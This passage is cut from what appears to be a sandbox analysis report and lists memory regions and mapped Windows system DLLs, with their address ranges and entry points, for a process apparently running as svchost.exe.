= 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1662 start_va = 0x779f0000 end_va = 0x779f6fff monitored = 0 entry_point = 0x779f106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1663 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1664 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1665 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1666 start_va = 0xff760000 end_va = 0xff76afff monitored = 0 entry_point = 0xff76246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1667 start_va = 0x7fef32c0000 end_va = 0x7fef32cefff monitored = 0 entry_point = 0x7fef32c9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1668 start_va = 0x7fef32d0000 end_va = 0x7fef3522fff monitored = 0 entry_point = 0x7fef32d236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1669 start_va = 0x7fef3530000 end_va = 0x7fef354afff monitored = 0 entry_point = 0x7fef3531198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1670 start_va = 0x7fef4200000 end_va = 0x7fef4244fff monitored = 0 entry_point = 0x7fef4233644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1671 start_va = 0x7fef4250000 end_va = 0x7fef4261fff monitored = 0 entry_point = 0x7fef42590bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1672 start_va = 0x7fef42e0000 end_va = 0x7fef42e9fff monitored = 0 entry_point = 0x7fef42e3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1673 start_va = 0x7fef42f0000 end_va = 0x7fef43c1fff monitored = 0 entry_point = 0x7fef4381a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1674 start_va = 0x7fef44d0000 end_va = 0x7fef46a3fff monitored = 0 entry_point = 0x7fef4506b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1675 start_va = 0x7fef4e80000 end_va = 0x7fef50f9fff monitored = 0 entry_point = 0x7fef4eb2200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1676 start_va = 0x7fef6500000 end_va = 0x7fef651bfff monitored = 0 entry_point = 0x7fef65011a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1677 start_va = 0x7fef6520000 end_va = 0x7fef6581fff monitored = 0 entry_point = 0x7fef6521198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1678 start_va = 0x7fef6590000 end_va = 0x7fef65c9fff monitored = 0 entry_point = 0x7fef6591010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1679 start_va = 0x7fef6d40000 end_va = 0x7fef6d5cfff monitored = 0 entry_point = 0x7fef6d42f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 1680 start_va = 0x7fef6e60000 end_va = 0x7fef6ea1fff monitored = 0 entry_point = 0x7fef6e90048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1681 start_va = 0x7fef7540000 end_va = 0x7fef7554fff monitored = 0 entry_point = 0x7fef7541020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1682 start_va = 0x7fef7600000 end_va = 0x7fef76edfff monitored = 0 entry_point = 0x7fef76012a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1683 start_va = 0x7fef93a0000 end_va = 0x7fef941bfff monitored = 0 entry_point = 0x7fef93a11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1684 start_va = 0x7fef9500000 end_va = 0x7fef9519fff monitored = 0 entry_point = 0x7fef9511ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1685 start_va = 0x7fef9520000 end_va = 0x7fef952efff monitored = 0 entry_point = 0x7fef9526894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1686 start_va = 0x7fef9530000 end_va = 0x7fef9537fff monitored = 0 entry_point = 0x7fef9531414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1687 start_va = 0x7fef9540000 end_va = 0x7fef95b0fff monitored = 0 entry_point = 0x7fef95851d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1688 start_va = 0x7fef95c0000 end_va = 0x7fef95d1fff monitored = 0 entry_point = 0x7fef95c89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1689 start_va = 0x7fef95e0000 end_va = 0x7fef9694fff monitored = 0 entry_point = 0x7fef965cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1690 start_va = 0x7fef96a0000 end_va = 0x7fef96b8fff monitored = 0 entry_point = 0x7fef96a1104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1691 start_va = 0x7fef96c0000 end_va = 0x7fef970ffff monitored = 0 entry_point = 0x7fef96c1190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1692 start_va = 0x7fef9710000 end_va = 0x7fef9717fff monitored = 0 entry_point = 0x7fef9711020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1693 start_va = 0x7fef9720000 end_va = 0x7fef9779fff monitored = 0 entry_point = 0x7fef975dde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1694 start_va = 0x7fef9780000 end_va = 0x7fef97a0fff monitored = 0 entry_point = 0x7fef97903b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1695 start_va = 0x7fef97b0000 end_va = 0x7fef9823fff monitored = 0 entry_point = 0x7fef97b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1696 start_va = 0x7fef9830000 end_va = 0x7fef989afff monitored = 0 entry_point = 0x7fef9874344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1697 start_va = 0x7fef98a0000 end_va = 0x7fef98b2fff monitored = 0 entry_point = 0x7fef98a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1698 start_va = 0x7fef98c0000 end_va = 0x7fef9921fff monitored = 0 entry_point = 0x7fef98fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1699 start_va = 0x7fef9930000 end_va = 0x7fef9a5bfff monitored = 0 entry_point = 0x7fef99e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1700 start_va = 0x7fef9a60000 end_va = 0x7fef9a79fff monitored = 0 entry_point = 0x7fef9a73fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1701 start_va = 0x7fef9a80000 end_va = 0x7fef9b03fff monitored = 0 entry_point = 0x7fef9ad1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1702 start_va = 0x7fef9b10000 end_va = 0x7fef9b34fff monitored = 0 entry_point = 0x7fef9b28c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1703 start_va = 0x7fef9b40000 end_va = 0x7fef9b7cfff monitored = 0 entry_point = 0x7fef9b41070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1704 start_va = 0x7fef9b80000 end_va = 0x7fef9b8dfff monitored = 0 entry_point = 0x7fef9b85500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1705 start_va = 0x7fef9b90000 end_va = 0x7fef9bb6fff monitored = 0 entry_point = 0x7fef9b911a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1706 start_va = 0x7fef9bc0000 end_va = 0x7fef9c92fff monitored = 0 entry_point = 0x7fef9c38b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1707 start_va = 0x7fef9ce0000 end_va = 0x7fef9d26fff monitored = 0 entry_point = 0x7fef9ce1040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1708 start_va = 0x7fef9d30000 end_va = 0x7fef9d71fff monitored = 0 entry_point = 0x7fef9d317e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1709 start_va = 0x7fef9d80000 end_va = 0x7fef9e11fff monitored = 0 entry_point = 0x7fef9df51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1710 start_va = 0x7fef9e20000 end_va = 0x7fef9e96fff monitored = 0 entry_point = 0x7fef9e5e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1711 start_va = 0x7fef9ea0000 end_va = 0x7fef9ed9fff monitored = 0 entry_point = 0x7fef9ebd020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1712 start_va = 0x7fefa190000 end_va = 0x7fefa1a0fff monitored = 0 entry_point = 0x7fefa199e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1713 start_va = 0x7fefa1d0000 end_va = 0x7fefa233fff monitored = 0 entry_point = 0x7fefa1d1254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1714 start_va = 0x7fefa240000 end_va = 0x7fefa2b0fff monitored = 0 entry_point = 0x7fefa241010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1715 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1716 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1717 start_va = 0x7fefa5d0000 end_va = 0x7fefa5dbfff monitored = 0 entry_point = 0x7fefa5d602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1718 start_va = 0x7fefa730000 end_va = 0x7fefa738fff monitored = 0 entry_point = 0x7fefa7311a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1719 start_va = 0x7fefa960000 end_va = 0x7fefa9d6fff monitored = 0 entry_point = 0x7fefa96afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1720 start_va = 0x7fefa9e0000 end_va = 0x7fefa9e9fff monitored = 0 entry_point = 0x7fefa9e260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1721 start_va = 0x7fefa9f0000 end_va = 0x7fefab01fff monitored = 0 entry_point = 0x7fefaa0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1722 start_va = 0x7fefab10000 end_va = 0x7fefab1efff monitored = 0 entry_point = 0x7fefab17e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1723 start_va = 0x7fefab20000 end_va = 0x7fefab28fff monitored = 0 entry_point = 0x7fefab23668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1724 start_va = 0x7fefab30000 end_va = 0x7fefab38fff monitored = 0 entry_point = 0x7fefab31020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1725 start_va = 0x7fefab40000 end_va = 0x7fefab95fff monitored = 0 entry_point = 0x7fefab41040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1726 start_va = 0x7fefaba0000 end_va = 0x7fefabfdfff monitored = 0 entry_point = 0x7fefaba9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1727 start_va = 0x7fefac00000 end_va = 0x7fefac17fff monitored = 0 entry_point = 0x7fefac01bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1728 start_va = 0x7fefac20000 end_va = 0x7fefac30fff monitored = 0 entry_point = 0x7fefac216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1729 start_va = 0x7fefac50000 end_va = 0x7fefaca2fff monitored = 0 entry_point = 0x7fefac52b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1730 start_va = 0x7fefb240000 end_va = 0x7fefb253fff monitored = 0 entry_point = 0x7fefb243e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1731 start_va = 0x7fefb260000 end_va = 0x7fefb26afff monitored = 0 entry_point = 0x7fefb261198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1732 start_va = 0x7fefb270000 end_va = 0x7fefb296fff monitored = 0 entry_point = 0x7fefb2798bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1733 start_va = 0x7fefb2a0000 end_va = 0x7fefb306fff monitored = 0 entry_point = 0x7fefb2b6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1734 start_va = 0x7fefb320000 end_va = 0x7fefb32afff monitored = 0 entry_point = 0x7fefb324f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1735 start_va = 0x7fefb330000 end_va = 0x7fefb33bfff monitored = 0 entry_point = 0x7fefb3315d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1736 start_va = 0x7fefb340000 end_va = 0x7fefb34ffff monitored = 0 entry_point = 0x7fefb34835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1737 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1738 start_va = 0x7fefb370000 end_va = 0x7fefb3a6fff monitored = 0 entry_point = 0x7fefb378424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1739 start_va = 0x7fefb3f0000 end_va = 0x7fefb404fff monitored = 0 entry_point = 0x7fefb3f60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1740 start_va = 0x7fefb410000 end_va = 0x7fefb4d1fff monitored = 0 entry_point = 0x7fefb41101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1741 start_va = 0x7fefb6f0000 end_va = 0x7fefb706fff monitored = 0 entry_point = 0x7fefb6f9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1742 start_va = 0x7fefb710000 end_va = 0x7fefb718fff monitored = 0 entry_point = 0x7fefb711010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1743 start_va = 0x7fefb800000 end_va = 0x7fefb82cfff monitored = 0 entry_point = 0x7fefb801010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1744 start_va = 0x7fefb830000 end_va = 0x7fefb840fff monitored = 0 entry_point = 0x7fefb8314c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1745 start_va = 0x7fefb890000 end_va = 0x7fefb900fff monitored = 0 entry_point = 0x7fefb8cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1746 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1747 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1748 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1749 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1750 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1751 start_va = 0x7fefbc60000 end_va = 0x7fefbc94fff monitored = 0 entry_point = 0x7fefbc61064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1752 start_va = 0x7fefc0d0000 end_va = 0x7fefc125fff monitored = 0 entry_point = 0x7fefc0dbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1753 start_va = 0x7fefc130000 end_va = 0x7fefc25bfff monitored = 0 entry_point = 0x7fefc1394bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1754 start_va = 0x7fefc260000 end_va = 0x7fefc27cfff monitored = 0 entry_point = 0x7fefc261ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1755 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1756 start_va = 0x7fefc940000 end_va = 0x7fefc94bfff monitored = 0 entry_point = 0x7fefc941064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1757 start_va = 0x7fefc950000 end_va = 0x7fefca0afff monitored = 0 entry_point = 0x7fefc956de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1758 start_va = 0x7fefca10000 end_va = 0x7fefca16fff monitored = 0 entry_point = 0x7fefca114b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1759 start_va = 0x7fefcb00000 end_va = 0x7fefcb1afff monitored = 0 entry_point = 0x7fefcb02068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1760 start_va = 0x7fefcb20000 end_va = 0x7fefcb3dfff monitored = 0 entry_point = 0x7fefcb213b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1761 start_va = 0x7fefcb40000 end_va = 0x7fefcb51fff monitored = 0 entry_point = 0x7fefcb41060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1762 start_va = 0x7fefcb60000 end_va = 0x7fefcb7efff monitored = 0 entry_point = 0x7fefcb65c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1763 start_va = 0x7fefcc30000 end_va = 0x7fefcc68fff monitored = 0 entry_point = 0x7fefcc3c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1764 start_va = 0x7fefcc70000 end_va = 0x7fefcc79fff monitored = 0 entry_point = 0x7fefcc73cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1765 start_va = 0x7fefcc80000 end_va = 0x7fefcc8cfff monitored = 0 entry_point = 0x7fefcc81348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1766 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1767 start_va = 0x7fefce60000 end_va = 0x7fefce8ffff monitored = 0 entry_point = 0x7fefce6194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1768 start_va = 0x7fefce90000 end_va = 0x7fefceeafff monitored = 0 entry_point = 0x7fefce96940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1769 start_va = 0x7fefd000000 end_va = 0x7fefd006fff monitored = 0 entry_point = 0x7fefd00142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1770 start_va = 0x7fefd010000 end_va = 0x7fefd064fff monitored = 0 entry_point = 0x7fefd011054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1771 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1772 start_va = 0x7fefd180000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd18144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1773 start_va = 0x7fefd1c0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1c2a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1774 start_va = 0x7fefd1d0000 end_va = 0x7fefd1d9fff monitored = 0 entry_point = 0x7fefd1d3b40 region_type = mapped_file name = 